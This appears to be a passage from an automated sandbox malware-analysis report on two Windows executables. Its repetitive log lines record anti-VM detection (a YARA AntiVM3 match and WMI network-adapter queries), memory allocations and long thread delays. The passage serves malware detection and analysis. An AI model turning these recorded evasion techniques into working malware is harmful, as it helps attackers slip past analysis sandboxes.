Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: dhPWt112uC.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: newapp.exe PID: 8136, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\dhPWt112uC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory allocated: B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory allocated: 2760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory allocated: 24E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory allocated: 75C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory allocated: 85C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory allocated: 8770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory allocated: 9770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory allocated: 17D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory allocated: 33D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Memory allocated: 3100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 2AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 4AE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 74A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 84A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 8640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 9640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 1770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 3210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 1770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 1510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 3230000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 3040000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 7A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 77A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 8A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 9A00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 10D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 2C70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Memory allocated: 2AB0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599753	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599280	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599168	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598951	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598842	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598487	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598349	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595968	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595842	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595732	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595285	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594700	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594251	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Users\user\Desktop\dhPWt112uC.exe	Thread delayed: delay time: 593906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599538	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599434	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599325	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599214	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598884	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598764	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598655	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596162	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Thread delayed: delay time: 594860
